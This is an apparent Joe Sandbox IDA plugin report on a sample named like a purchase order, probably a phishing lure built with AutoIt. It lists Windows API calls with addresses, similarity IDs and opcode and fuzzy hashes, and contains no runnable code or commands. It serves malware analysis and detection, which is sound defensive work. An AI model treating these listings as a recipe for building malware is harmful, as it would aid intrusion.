                          Similarity
                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                          • String ID:
                          • API String ID: 839392675-0
                          APIs
                          • GetClientRect.USER32(?), ref: 00F57452
                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F57469
                          • GetWindowDC.USER32(?), ref: 00F57475
                          • GetPixel.GDI32(00000000,?,?), ref: 00F57484
                          • ReleaseDC.USER32(?,00000000), ref: 00F57496
                          • GetSysColor.USER32(00000005), ref: 00F574B0
                          Similarity
                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                          • String ID:
                          • API String ID: 272304278-0
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F6187F
                          • UnloadUserProfile.USERENV(?,?), ref: 00F6188B
                          • CloseHandle.KERNEL32(?), ref: 00F61894
                          • CloseHandle.KERNEL32(?), ref: 00F6189C
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00F618A5
                          • HeapFree.KERNEL32(00000000), ref: 00F618AC
                          Similarity
                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                          • String ID:
                          • API String ID: 146765662-0
                          APIs
                            • Part of subcall function 00F07620: _wcslen.LIBCMT ref: 00F07625
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F6C6EE
                          • _wcslen.LIBCMT ref: 00F6C735
                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F6C79C
                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F6C7CA
                          Strings
                          Similarity
                          • API ID: ItemMenu$Info_wcslen$Default
                          • String ID: 0
                          • API String ID: 1227352736-4108050209
                          APIs
                          • ShellExecuteExW.SHELL32(0000003C), ref: 00F8AEA3
                            • Part of subcall function 00F07620: _wcslen.LIBCMT ref: 00F07625
                          • GetProcessId.KERNEL32(00000000), ref: 00F8AF38
                          • CloseHandle.KERNEL32(00000000), ref: 00F8AF67
                          Strings
                          Similarity
                          • API ID: CloseExecuteHandleProcessShell_wcslen
                          • String ID: <$@
                          • API String ID: 146682121-1426351568
                          APIs
                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F67206
                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F6723C
                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F6724D
                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F672CF
                          Strings
                          Similarity
                          • API ID: ErrorMode$AddressCreateInstanceProc
                          • String ID: DllGetClassObject
                          • API String ID: 753597075-1075368562
                          APIs
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F93E35
                          • IsMenu.USER32(?), ref: 00F93E4A
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F93E92
                          • DrawMenuBar.USER32 ref: 00F93EA5
                          Strings
                          Similarity
                          • API ID: Menu$Item$DrawInfoInsert
                          • String ID: 0
                          • API String ID: 3076010158-4108050209
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F63CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F63CCA
                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F61E66
                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F61E79
                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F61EA9
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          Strings
                          Similarity
                          • API ID: MessageSend$_wcslen$ClassName
                          • String ID: ComboBox$ListBox
                          • API String ID: 2081771294-1403004172
                          APIs
                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F92F8D
                          • LoadLibraryW.KERNEL32(?), ref: 00F92F94
                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F92FA9
                          • DestroyWindow.USER32(?), ref: 00F92FB1
                          Strings
                          Similarity
                          • API ID: MessageSend$DestroyLibraryLoadWindow
                          • String ID: SysAnimate32
                          • API String ID: 3529120543-1011021900
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F24D1E,00F328E9,?,00F24CBE,00F328E9,00FC88B8,0000000C,00F24E15,00F328E9,00000002), ref: 00F24D8D
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F24DA0
                          • FreeLibrary.KERNEL32(00000000,?,?,?,00F24D1E,00F328E9,?,00F24CBE,00F328E9,00FC88B8,0000000C,00F24E15,00F328E9,00000002,00000000), ref: 00F24DC3
                          Strings
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F04EDD,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04E9C
                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F04EAE
                          • FreeLibrary.KERNEL32(00000000,?,?,00F04EDD,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04EC0
                          Strings
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                          • API String ID: 145871493-3689287502
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F43CDE,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04E62
                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F04E74
                          • FreeLibrary.KERNEL32(00000000,?,?,00F43CDE,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04E87
                          Strings
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                          • API String ID: 145871493-1355242751
                          APIs
                          • GetCurrentProcessId.KERNEL32 ref: 00F8A427
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F8A435
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F8A468
                          • CloseHandle.KERNEL32(?), ref: 00F8A63D
                          Similarity
                          • API ID: Process$CloseCountersCurrentHandleOpen
                          • String ID:
                          • API String ID: 3488606520-0
                          APIs
                            • Part of subcall function 00F6DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F6CF22,?), ref: 00F6DDFD
                            • Part of subcall function 00F6DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F6CF22,?), ref: 00F6DE16
                            • Part of subcall function 00F6E199: GetFileAttributesW.KERNEL32(?,00F6CF95), ref: 00F6E19A
                          • lstrcmpiW.KERNEL32(?,?), ref: 00F6E473
                          • MoveFileW.KERNEL32(?,?), ref: 00F6E4AC
                          • _wcslen.LIBCMT ref: 00F6E5EB
                          • _wcslen.LIBCMT ref: 00F6E603
                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00F6E650
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F8C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8B6AE,?,?), ref: 00F8C9B5
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8C9F1
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA68
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8BAA5
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8BB00
                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F8BB63
                          • RegCloseKey.ADVAPI32(?,?), ref: 00F8BBA6
                          • RegCloseKey.ADVAPI32(00000000), ref: 00F8BBB3
                          Similarity
                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00F68BCD
                          • VariantClear.OLEAUT32 ref: 00F68C3E
                          • VariantClear.OLEAUT32 ref: 00F68C9D
                          • VariantClear.OLEAUT32(?), ref: 00F68D10
                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F68D3B
                          Similarity
                          • API ID: Variant$Clear$ChangeInitType
                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F78BAE
                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00F78BDA
                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F78C32
                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F78C57
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F78C5F
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String
                          APIs
                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00F88F40
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00F88FD0
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F88FEC
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00F89032
                          • FreeLibrary.KERNEL32(00000000), ref: 00F89052
                            • Part of subcall function 00F1F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00F71043,?,753CE610), ref: 00F1F6E6
                            • Part of subcall function 00F1F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00F5FA64,00000000,00000000,?,?,00F71043,?,753CE610,?,00F5FA64), ref: 00F1F70D
                          Similarity
                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                          APIs
                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00F96C33
                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00F96C4A
                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00F96C73
                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00F7AB79,00000000,00000000), ref: 00F96C98
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00F96CC7
                          Similarity
                          • API ID: Window$Long$MessageSendShow
                          APIs
                          Similarity
                          • API ID: _free
                          APIs
                          • GetCursorPos.USER32(?), ref: 00F19141
                          • ScreenToClient.USER32(00000000,?), ref: 00F1915E
                          • GetAsyncKeyState.USER32(00000001), ref: 00F19183
                          • GetAsyncKeyState.USER32(00000002), ref: 00F1919D
                          Similarity
                          • API ID: AsyncState$ClientCursorScreen
                          APIs
                          • GetInputState.USER32 ref: 00F738CB
                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00F73922
                          • TranslateMessage.USER32(?), ref: 00F7394B
                          • DispatchMessageW.USER32(?), ref: 00F73955
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F73966
                          Similarity
                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                          APIs
                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00F7CF38
                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00F7CF6F
                          • GetLastError.KERNEL32(?,00000000,?,?,?,00F7C21E,00000000), ref: 00F7CFB4
                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F7C21E,00000000), ref: 00F7CFC8
                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F7C21E,00000000), ref: 00F7CFF2
                          Similarity
                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00F61915
                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 00F619C1
                          • Sleep.KERNEL32(00000000,?,?,?), ref: 00F619C9
                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 00F619DA
                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00F619E2
                          Similarity
                          • API ID: MessagePostSleep$RectWindow
                          APIs
                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F95745
                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F9579D
                          • _wcslen.LIBCMT ref: 00F957AF
                          • _wcslen.LIBCMT ref: 00F957BA
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F95816
                          Similarity
                          • API ID: MessageSend$_wcslen
                          APIs
                          • IsWindow.USER32(00000000), ref: 00F80951
                          • GetForegroundWindow.USER32 ref: 00F80968
                          • GetDC.USER32(00000000), ref: 00F809A4
                          • GetPixel.GDI32(00000000,?,00000003), ref: 00F809B0
                          • ReleaseDC.USER32(00000000,00000003), ref: 00F809E8
                          Similarity
                          • API ID: Window$ForegroundPixelRelease
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 00F3CDC6
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F3CDE9
                            • Part of subcall function 00F33820: RtlAllocateHeap.NTDLL(00000000,?,00FD1444,?,00F1FDF5,?,?,00F0A976,00000010,00FD1440,00F013FC,?,00F013C6,?,00F01129), ref: 00F33852
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F3CE0F
                          • _free.LIBCMT ref: 00F3CE22
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F3CE31
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          APIs
                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F19693
                          • SelectObject.GDI32(?,00000000), ref: 00F196A2
                          • BeginPath.GDI32(?), ref: 00F196B9
                          • SelectObject.GDI32(?,00000000), ref: 00F196E2
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID:
                          • API String ID: 2931989736-0
                          • Opcode ID: 9e68923f695ecf4e8d1d2c5c73980e84cc908c7e317019d2851782a9c5ab4335
                          • Instruction ID: 3b9241c8add2b210cb6d9da315d0a88cd81bd3838e08d1e96d606416c8baf0d6
                          • Opcode Fuzzy Hash: 9e68923f695ecf4e8d1d2c5c73980e84cc908c7e317019d2851782a9c5ab4335
                          • Instruction Fuzzy Hash: 8301B562A4161DBBE6089510AD82FBB735DAB71BB4F004020FD04BE641F765ED24B2E5
                          APIs
                          • GetLastError.KERNEL32(?,?,?,00F2F2DE,00F33863,00FD1444,?,00F1FDF5,?,?,00F0A976,00000010,00FD1440,00F013FC,?,00F013C6), ref: 00F32DFD
                          • _free.LIBCMT ref: 00F32E32
                          • _free.LIBCMT ref: 00F32E59
                          • SetLastError.KERNEL32(00000000,00F01129), ref: 00F32E66
                          • SetLastError.KERNEL32(00000000,00F01129), ref: 00F32E6F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          • API String ID: 3170660625-0
                          • Opcode ID: 94e3a229b25fa3aa3fe479c74b5a957ade7bcf42dc8612bf9f200a9577a1702d
                          • Instruction ID: c7fb98f0df8e58f5ec00677305bb0f0a330fc86be8f0b3b830c422d6b89decc4
                          • Opcode Fuzzy Hash: 94e3a229b25fa3aa3fe479c74b5a957ade7bcf42dc8612bf9f200a9577a1702d
                          • Instruction Fuzzy Hash: 120128326056046BC65267797C87E2F366EABC17B1F250029F425A32D2EF78CC8170A0
                          APIs
                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?,?,00F6035E), ref: 00F6002B
                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?), ref: 00F60046
                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?), ref: 00F60054
                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?), ref: 00F60064
                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?), ref: 00F60070
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: From$Prog$FreeStringTasklstrcmpi
                          • String ID:
                          • API String ID: 3897988419-0
                          • Opcode ID: 9a4506ab40ed5ccf81425700296f270907cb24ec9e7c2febe46694a5eb65c662
                          • Instruction ID: b2bfa6dd865f0ac923e515e307290935b9694f233324fa59e0e7110f1e76f8aa
                          • Opcode Fuzzy Hash: 9a4506ab40ed5ccf81425700296f270907cb24ec9e7c2febe46694a5eb65c662
                          • Instruction Fuzzy Hash: E701A272600208BFDB104F68DC04BAB7AEDEF847A1F244125F905D2210DB71DD40BBA0
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?), ref: 00F6E997
                          • QueryPerformanceFrequency.KERNEL32(?), ref: 00F6E9A5
                          • Sleep.KERNEL32(00000000), ref: 00F6E9AD
                          • QueryPerformanceCounter.KERNEL32(?), ref: 00F6E9B7
                          • Sleep.KERNEL32 ref: 00F6E9F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          • Opcode ID: 18833738d564903b0d9a1f682952bbccaa57d86457227e141ed49f6969d6042e
                          • Instruction ID: 0ac96565eb5ff840c8c9a6e24a8999d161f8359b87740e2f61bc8a4d5b9466d7
                          • Opcode Fuzzy Hash: 18833738d564903b0d9a1f682952bbccaa57d86457227e141ed49f6969d6042e
                          • Instruction Fuzzy Hash: 17015336C0162DDBCF00AFE5DC59AEEBB78BF08710F000556E902B3241CB309690ABA6
                          APIs
                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F61114
                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F61120
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F6112F
                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F61136
                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F6114D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 842720411-0
                          • Opcode ID: 61ef83139bf3c47cfa9e44531f5f997dc883843166e0beca39e98f3a21de35d1
                          • Instruction ID: 5fe07b01aacd37d3d56d87659322eb5d724f8d6abbb4fd9dbaf394c7a08313d7
                          • Opcode Fuzzy Hash: 61ef83139bf3c47cfa9e44531f5f997dc883843166e0beca39e98f3a21de35d1
                          • Instruction Fuzzy Hash: FD013175500209BFDB114FA5DC49E6A3F6EFF86360B554416FA45D7360DB31DC40AEA0
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F60FCA
                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F60FD6
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F60FE5
                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F60FEC
                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F61002
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 44706859-0
                          • Opcode ID: bda8be50d32f80ab5c10b1d25f208217cd4a3ab5d489eba414bdf508acf7e264
                          • Instruction ID: ac43708fd74358e9ccb92eed9e03927f57b8b98770c384593dbcee6ef95d3304
                          • Opcode Fuzzy Hash: bda8be50d32f80ab5c10b1d25f208217cd4a3ab5d489eba414bdf508acf7e264
                          • Instruction Fuzzy Hash: 3BF04935600309BBDB214FA59C49F5A3BADFF89762F644416FA49C6261CA70DC80AAB0
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F6102A
                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F61036
                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F61045
                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F6104C
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F61062
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 44706859-0
                          • Opcode ID: 4fbc2aff57fd9e1385362ea0b66dce86e21a818b27d1583a168795299256e8fd
                          • Instruction ID: 3200816a28f763d769cc446b5f439ee960fb8ae3bb6e7dd70e5cbda6431e6d20
                          • Opcode Fuzzy Hash: 4fbc2aff57fd9e1385362ea0b66dce86e21a818b27d1583a168795299256e8fd
                          • Instruction Fuzzy Hash: 4CF06D35600319FBDB215FA5EC49F5A3BADFF89761F240416FA45C7261CA70D880AAB0
                          APIs
                          • CloseHandle.KERNEL32(?,?,?,?,00F7017D,?,00F732FC,?,00000001,00F42592,?), ref: 00F70324
                          • CloseHandle.KERNEL32(?,?,?,?,00F7017D,?,00F732FC,?,00000001,00F42592,?), ref: 00F70331
                          • CloseHandle.KERNEL32(?,?,?,?,00F7017D,?,00F732FC,?,00000001,00F42592,?), ref: 00F7033E
                          • CloseHandle.KERNEL32(?,?,?,?,00F7017D,?,00F732FC,?,00000001,00F42592,?), ref: 00F7034B
                          • CloseHandle.KERNEL32(?,?,?,?,00F7017D,?,00F732FC,?,00000001,00F42592,?), ref: 00F70358
                          • CloseHandle.KERNEL32(?,?,?,?,00F7017D,?,00F732FC,?,00000001,00F42592,?), ref: 00F70365
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: 91dacb946deb6feb227caa339527e20829f91ef2a9a5600f471baa5ddde8180f
                          • Instruction ID: ac4a3b62933e60f4dda72057f692c51eabf2354f843ab26be1618f3416875c1b
                          • Opcode Fuzzy Hash: 91dacb946deb6feb227caa339527e20829f91ef2a9a5600f471baa5ddde8180f
                          • Instruction Fuzzy Hash: ED019072800B15DFC7309F66D880812F7F5BE502253158A3FD19A52931C771A954EE81
                          APIs
                          • _free.LIBCMT ref: 00F3D752
                            • Part of subcall function 00F329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000), ref: 00F329DE
                            • Part of subcall function 00F329C8: GetLastError.KERNEL32(00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000,00000000), ref: 00F329F0
                          • _free.LIBCMT ref: 00F3D764
                          • _free.LIBCMT ref: 00F3D776
                          • _free.LIBCMT ref: 00F3D788
                          • _free.LIBCMT ref: 00F3D79A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
